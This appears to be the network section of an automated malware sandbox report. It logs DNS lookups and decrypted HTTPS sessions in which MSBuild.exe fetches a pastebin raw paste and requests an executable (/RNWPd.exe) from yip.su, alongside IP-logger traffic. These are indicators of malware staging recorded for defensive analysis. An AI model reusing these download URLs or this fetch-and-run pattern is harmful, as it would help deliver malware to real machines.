Sep 16, 2024 21:24:11.682326078 CEST	443	49802	188.114.97.3	192.168.2.6
Sep 16, 2024 21:24:11.682346106 CEST	49802	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:24:11.682363033 CEST	443	49802	188.114.97.3	192.168.2.6
Sep 16, 2024 21:24:11.682377100 CEST	49802	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:24:11.682401896 CEST	49802	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:24:11.682703018 CEST	443	49802	188.114.97.3	192.168.2.6
Sep 16, 2024 21:24:11.682799101 CEST	443	49802	188.114.97.3	192.168.2.6
Sep 16, 2024 21:24:11.683681011 CEST	49802	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:24:11.828561068 CEST	49802	443	192.168.2.6	188.114.97.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 16, 2024 21:20:09.529740095 CEST	64058	53	192.168.2.6	1.1.1.1
Sep 16, 2024 21:20:09.536986113 CEST	53	64058	1.1.1.1	192.168.2.6
Sep 16, 2024 21:20:10.512762070 CEST	61430	53	192.168.2.6	1.1.1.1
Sep 16, 2024 21:20:10.669778109 CEST	53	61430	1.1.1.1	192.168.2.6
Sep 16, 2024 21:20:33.413784981 CEST	60387	53	192.168.2.6	1.1.1.1
Sep 16, 2024 21:20:33.421603918 CEST	53	60387	1.1.1.1	192.168.2.6
Sep 16, 2024 21:24:09.694921017 CEST	60204	53	192.168.2.6	1.1.1.1
Sep 16, 2024 21:24:09.702759027 CEST	53	60204	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 16, 2024 21:20:09.529740095 CEST	192.168.2.6	1.1.1.1	0xf623	Standard query (0)	pastebin.com	A (IP address)	IN (0x0001)	false
Sep 16, 2024 21:20:10.512762070 CEST	192.168.2.6	1.1.1.1	0xdc05	Standard query (0)	yip.su	A (IP address)	IN (0x0001)	false
Sep 16, 2024 21:20:33.413784981 CEST	192.168.2.6	1.1.1.1	0x1cc8	Standard query (0)	iplogger.com	A (IP address)	IN (0x0001)	false
Sep 16, 2024 21:24:09.694921017 CEST	192.168.2.6	1.1.1.1	0x34dd	Standard query (0)	pastebin.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Sep 16, 2024 21:20:09.536986113 CEST	1.1.1.1	192.168.2.6	0xf623	No error (0)	pastebin.com		104.20.4.235	A (IP address)	IN (0x0001)	false
Sep 16, 2024 21:20:09.536986113 CEST	1.1.1.1	192.168.2.6	0xf623	No error (0)	pastebin.com		172.67.19.24	A (IP address)	IN (0x0001)	false
Sep 16, 2024 21:20:09.536986113 CEST	1.1.1.1	192.168.2.6	0xf623	No error (0)	pastebin.com		104.20.3.235	A (IP address)	IN (0x0001)	false
Sep 16, 2024 21:20:10.669778109 CEST	1.1.1.1	192.168.2.6	0xdc05	No error (0)	yip.su		188.114.97.3	A (IP address)	IN (0x0001)	false
Sep 16, 2024 21:20:10.669778109 CEST	1.1.1.1	192.168.2.6	0xdc05	No error (0)	yip.su		188.114.96.3	A (IP address)	IN (0x0001)	false
Sep 16, 2024 21:20:24.066617966 CEST	1.1.1.1	192.168.2.6	0xe82b	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Sep 16, 2024 21:20:24.066617966 CEST	1.1.1.1	192.168.2.6	0xe82b	No error (0)	fp2e7a.wpc.phicdn.net		192.229.221.95	A (IP address)	IN (0x0001)	false
Sep 16, 2024 21:20:33.421603918 CEST	1.1.1.1	192.168.2.6	0x1cc8	No error (0)	iplogger.com		104.21.76.57	A (IP address)	IN (0x0001)	false
Sep 16, 2024 21:20:33.421603918 CEST	1.1.1.1	192.168.2.6	0x1cc8	No error (0)	iplogger.com		172.67.188.178	A (IP address)	IN (0x0001)	false
Sep 16, 2024 21:24:09.702759027 CEST	1.1.1.1	192.168.2.6	0x34dd	No error (0)	pastebin.com		104.20.4.235	A (IP address)	IN (0x0001)	false
Sep 16, 2024 21:24:09.702759027 CEST	1.1.1.1	192.168.2.6	0x34dd	No error (0)	pastebin.com		104.20.3.235	A (IP address)	IN (0x0001)	false
Sep 16, 2024 21:24:09.702759027 CEST	1.1.1.1	192.168.2.6	0x34dd	No error (0)	pastebin.com		172.67.19.24	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

pastebin.com

yip.su

iplogger.com

HTTPS Connections

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Sep 16, 2024 21:21:10.921356916 CEST	104.20.4.235	443	192.168.2.6	49735	CN=pastebin.com CN=WE1, O=Google Trust Services, C=US CN=GTS Root R4, O=Google Trust Services LLC, C=US	CN=WE1, O=Google Trust Services, C=US CN=GTS Root R4, O=Google Trust Services LLC, C=US CN=GlobalSign Root CA, OU=Root CA, O=GlobalSign nv-sa, C=BE	Mon Aug 12 02:59:26 CEST 2024 Wed Dec 13 10:00:00 CET 2023 Wed Nov 15 04:43:21 CET 2023	Sun Nov 10 01:59:25 CET 2024 Tue Feb 20 15:00:00 CET 2029 Fri Jan 28 01:00:42 CET 2028	771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0	3b5074b1b5d032e5620f69f9f700ff0e
					CN=WE1, O=Google Trust Services, C=US	CN=GTS Root R4, O=Google Trust Services LLC, C=US	Wed Dec 13 10:00:00 CET 2023	Tue Feb 20 15:00:00 CET 2029
					CN=GTS Root R4, O=Google Trust Services LLC, C=US	CN=GlobalSign Root CA, OU=Root CA, O=GlobalSign nv-sa, C=BE	Wed Nov 15 04:43:21 CET 2023	Fri Jan 28 01:00:42 CET 2028

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49713	104.20.4.235	443	1340	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-16 19:20:10 UTC	74	OUT	GET /raw/V6VJsrV3 HTTP/1.1 Host: pastebin.com Connection: Keep-Alive
2024-09-16 19:20:10 UTC	222	IN	HTTP/1.1 200 OK Date: Mon, 16 Sep 2024 19:20:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Server: cloudflare CF-RAY: 8c433657797a42b3-EWR
2024-09-16 19:20:10 UTC	1147	IN	Data Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-09-16 19:20:10 UTC	1369	IN	Data Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72 Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
2024-09-16 19:20:10 UTC	1369	IN	Data Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
2024-09-16 19:20:10 UTC	529	IN	Data Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76 Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
2024-09-16 19:20:10 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49716	188.114.97.3	443	1340	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-16 19:20:11 UTC	65	OUT	GET /RNWPd.exe HTTP/1.1 Host: yip.su Connection: Keep-Alive
2024-09-16 19:20:11 UTC	904	IN	HTTP/1.1 200 OK Date: Mon, 16 Sep 2024 19:20:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close memory: 0.36197662353515625 expires: Mon, 16 Sep 2024 19:20:11 +0000 strict-transport-security: max-age=604800 strict-transport-security: max-age=31536000 content-security-policy: img-src https: data:; upgrade-insecure-requests x-frame-options: SAMEORIGIN Cache-Control: max-age=14400 CF-Cache-Status: EXPIRED Last-Modified: Mon, 16 Sep 2024 19:20:11 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=asZnoj7RL3AbeCsAXFtW94C1FUOUx7WZxaBGvmg%2BPfYYy8gincM%2FEK5LYz0XIsCLDZHvLaMVth2WAuzs3oo05Yon6CYUXoqtPW%2BLzR%2FP9yG35Nu4ehSXc%2FY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c43365e09350ca0-EWR alt-svc: h3=":443"; ma=86400
2024-09-16 19:20:11 UTC	465	IN	Data Raw: 31 64 32 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c Data Ascii: 1d26<!DOCTYPE html><html lang="" class="html"><head><title></title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,
2024-09-16 19:20:11 UTC	1369	IN	Data Raw: 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 37 20 64 61 79 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 73 68 6f 72 74 65 6e 65 72 2c 20 69 70 6c 6f 67 67 65 72 2c 20 73 68 6f 72 74 6c 69 6e 6b 2c 20 75 72 6c 2c 20 64 6f 6d 61 69 6e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 69 70 6c 6f 67 67 65 72 2e 6f 72 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 0a 09 3c 6d 65 74 61 20 70 72 6f Data Ascii: t-after" content="7 days" /><meta name="keywords" content="shortener, iplogger, shortlink, url, domain" /><meta name="description" content="" /><link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" /><meta pro
2024-09-16 19:20:11 UTC	1369	IN	Data Raw: 75 6e 64 2d 63 6f 6c 6f 72 3a 23 33 33 38 62 64 39 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 32 35 70 78 20 35 70 78 20 30 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 33 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 Data Ascii: und-color:#338bd9;display:inline-block;margin:25px 5px 0;-webkit-animation:jump 1s linear infinite;animation:jump 1s linear infinite}#loader>span:nth-child(2){-webkit-animation-delay:0.2s;animation-delay:0.2s}#loader>span:nth-child(3){-webkit-animation-de
2024-09-16 19:20:11 UTC	1369	IN	Data Raw: 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 27 57 69 6e 64 6f 77 73 27 29 7b 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 67 65 74 48 69 67 68 45 6e 74 72 6f 70 79 56 61 6c 75 65 73 28 5b 27 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 27 5d 29 2e 74 68 65 6e 28 75 61 3d 3e 7b 5f 70 3d 70 61 72 73 65 49 6e 74 28 75 61 2e 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 2e 73 70 6c 69 74 28 27 2e 27 29 5b 30 5d 29 7d 29 7d 0a 09 76 61 72 20 5f 79 3d 5b 5d 2c 5f 7a 3d 7b 7d 2c 5f 78 3d 66 75 6e 63 74 69 6f 6e 28 6e 61 6d 65 2c 64 61 74 61 2c 6e 29 7b 69 66 28 74 79 70 65 6f 66 28 64 61 74 61 29 21 3d 3d 27 6f 62 6a 65 63 74 27 29 7b 64 61 74 61 3d 7b 7d 7d 3b 6e 3d 5f 79 2e 69 6e 64 65 78 4f 66 28 6e Data Ascii: .userAgentData.platform==='Windows'){navigator.userAgentData.getHighEntropyValues(['platformVersion']).then(ua=>{_p=parseInt(ua.platformVersion.split('.')[0])})}var _y=[],_z={},_x=function(name,data,n){if(typeof(data)!=='object'){data={}};n=_y.indexOf(n
2024-09-16 19:20:11 UTC	1369	IN	Data Raw: 3e 0a 0a 3c 73 74 79 6c 65 3e 0a 2e 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 34 34 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 33 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 62 6f 72 Data Ascii: ><style>.wrapper{margin-top:100px}.container{width:440px;min-width:320px;height:350px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;text-align:center;flex-wrap:wrap;margin:auto;bor
2024-09-16 19:20:11 UTC	1369	IN	Data Raw: 33 31 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 6c 6f 67 6f 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 37 34 64 37 63 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 0a 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 3c 64 69 76 20 Data Ascii: 31px;margin:auto}.logo .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain"><div
2024-09-16 19:20:11 UTC	160	IN	Data Raw: 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: .style.position='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
2024-09-16 19:20:11 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49719	104.20.4.235	443	1340	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-16 19:20:16 UTC	74	OUT	GET /raw/V6VJsrV3 HTTP/1.1 Host: pastebin.com Connection: Keep-Alive
2024-09-16 19:20:16 UTC	222	IN	HTTP/1.1 200 OK Date: Mon, 16 Sep 2024 19:20:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Server: cloudflare CF-RAY: 8c43367e59517cac-EWR
2024-09-16 19:20:16 UTC	1147	IN	Data Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-09-16 19:20:16 UTC	1369	IN	Data Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72 Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
2024-09-16 19:20:16 UTC	1369	IN	Data Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
